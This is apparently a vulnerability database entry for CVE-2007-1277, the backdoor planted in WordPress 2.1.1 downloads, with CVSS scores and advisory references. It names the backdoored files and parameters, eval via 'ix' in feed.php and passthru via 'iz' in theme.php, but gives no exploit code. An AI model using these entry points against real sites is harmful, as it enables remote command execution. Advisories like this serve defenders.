Vulnerability Name:

CVE-2007-1277 (CCN-32804)

Assigned:2007-03-02
Published:2007-03-02
Updated:2018-10-16
Summary:WordPress 2.1.1, as downloaded from some official distribution sites during February and March 2007, contains an externally introduced backdoor that allows remote attackers to execute arbitrary commands via (1) an eval injection vulnerability in the ix parameter to wp-includes/feed.php, and (2) an untrusted passthru call in the iz parameter to wp-includes/theme.php.
This vulnerability is addressed in the following product update:
http://wordpress.org/development/2007/03/upgrade-212/
CVSS v3 Severity:7.3 High (CCN CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)
Exploitability Metrics:Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope:Scope (S): Unchanged
Impact Metrics:Confidentiality (C): Low
Integrity (I): Low
Availibility (A): Low
CVSS v2 Severity:7.5 High (CVSS v2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P)
5.5 Medium (Temporal CVSS v2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P/E:U/RL:OF/RC:C)
Exploitability Metrics:Access Vector (AV): 
Access Complexity (AC): 
Authentication (Au): 
Impact Metrics:Confidentiality (C): 
Integrity (I): 
Availibility (A): 
7.5 High (CCN CVSS v2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P)
5.5 Medium (CCN Temporal CVSS v2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P/E:U/RL:OF/RC:C)
Exploitability Metrics:Access Vector (AV): 
Access Complexity (AC): 
Athentication (Au): 
Impact Metrics:Confidentiality (C): 
Integrity (I): 
Availibility (A): 
Vulnerability Type:CWE-20
Vulnerability Consequences:Gain Access
References:Source: MITRE
Type: CNA
CVE-2007-1277

Source: MISC
Type: Exploit
http://ifsec.blogspot.com/2007/03/wordpress-code-compromised-to-enable.html

Source: CCN
Type: SA24374
WordPress Command Execution and PHP "eval()" Injection

Source: SECUNIA
Type: Vendor Advisory
24374

Source: CCN
Type: WordPress Web site
WordPress

Source: CCN
Type: WordPress Blog, March 2, 2007
WORDPRESS 2.1.1 DANGEROUS, UPGRADE

Source: CONFIRM
Type: Vendor Advisory
http://wordpress.org/development/2007/03/upgrade-212/

Source: CCN
Type: US-CERT VU#214480
WordPress fails to properly sanitize input passed to the ix parameter in wp-includes/feed.php

Source: CERT-VN
Type: US Government Resource
VU#214480

Source: CCN
Type: US-CERT VU#641456
WordPress fails to properly sanitize input passed to the iz parameter in wp-includes/theme.php

Source: CERT-VN
Type: US Government Resource
VU#641456

Source: BUGTRAQ
Type: UNKNOWN
20070303 WordPress source code compromised to enable remote code execution

Source: BID
Type: UNKNOWN
22797

Source: CCN
Type: BID-22797
Wordpress 2.1.1 Command Execution Backdoor Vulnerability

Source: CCN
Type: BID-23321
Microsoft Windows Explorer BMP Image Denial of Service Vulnerability

Source: VUPEN
Type: UNKNOWN
ADV-2007-0812

Source: XF
Type: UNKNOWN
wordpress-feed-code-execution(32804)

Source: XF
Type: UNKNOWN
wordpress-feed-code-execution(32804)

Source: XF
Type: UNKNOWN
wordpress-theme-command-execution(32807)

Vulnerable Configuration:Configuration 1:
  • cpe:/a:wordpress:wordpress:2.1.1:-:*:*:*:*:*:*

    • * Denotes that component is vulnerable
    Vulnerability Name:

    CVE-2007-1277 (CCN-32807)

    Assigned:2007-03-02
    Published:2007-03-02
    Updated:2007-03-02
    Summary:WordPress could allow a remote attacker to execute arbitrary commands on the system, caused by improper validation of user-supplied input by the theme.php script. A remote attacker could send a specially-crafted request to the theme.php script using the iz parameter to inject and execute malicious shell commands with the privileges of the Web server.
    CVSS v3 Severity:7.3 High (CCN CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)
    Exploitability Metrics:Attack Vector (AV): Network
    Attack Complexity (AC): Low
    Privileges Required (PR): None
    User Interaction (UI): None
    Scope:Scope (S): Unchanged
    Impact Metrics:Confidentiality (C): Low
    Integrity (I): Low
    Availibility (A): Low
    CVSS v2 Severity:7.5 High (CVSS v2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P)
    5.5 Medium (Temporal CVSS v2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P/E:U/RL:OF/RC:C)
    Exploitability Metrics:Access Vector (AV): 
    Access Complexity (AC): 
    Authentication (Au): 
    Impact Metrics:Confidentiality (C): 
    Integrity (I): 
    Availibility (A): 
    7.5 High (CCN CVSS v2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P)
    5.5 Medium (CCN Temporal CVSS v2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P/E:U/RL:OF/RC:C)
    Exploitability Metrics:Access Vector (AV): 
    Access Complexity (AC): 
    Athentication (Au): 
    Impact Metrics:Confidentiality (C): 
    Integrity (I): 
    Availibility (A): 
    Vulnerability Consequences:Gain Access
    References:Source: MITRE
    Type: CNA
    CVE-2007-1277

    Source: CCN
    Type: SA24374
    WordPress Command Execution and PHP "eval()" Injection

    Source: CCN
    Type: WordPress Web site
    WordPress

    Source: CCN
    Type: WordPress Blog, March 2, 2007
    WORDPRESS 2.1.1 DANGEROUS, UPGRADE

    Source: CCN
    Type: US-CERT VU#214480
    WordPress fails to properly sanitize input passed to the ix parameter in wp-includes/feed.php

    Source: CCN
    Type: US-CERT VU#641456
    WordPress fails to properly sanitize input passed to the iz parameter in wp-includes/theme.php

    Source: CCN
    Type: BID-22797
    Wordpress 2.1.1 Command Execution Backdoor Vulnerability

    Source: XF
    Type: UNKNOWN
    wordpress-theme-command-execution(32807)

    Vulnerable Configuration:Configuration CCN 1:
  • cpe:/a:wordpress:wordpress:2.1.1:-:*:*:*:*:*:*

    • * Denotes that component is vulnerable
    BACK
    wordpress wordpress 2.1.1
    wordpress wordpress 2.1.1 -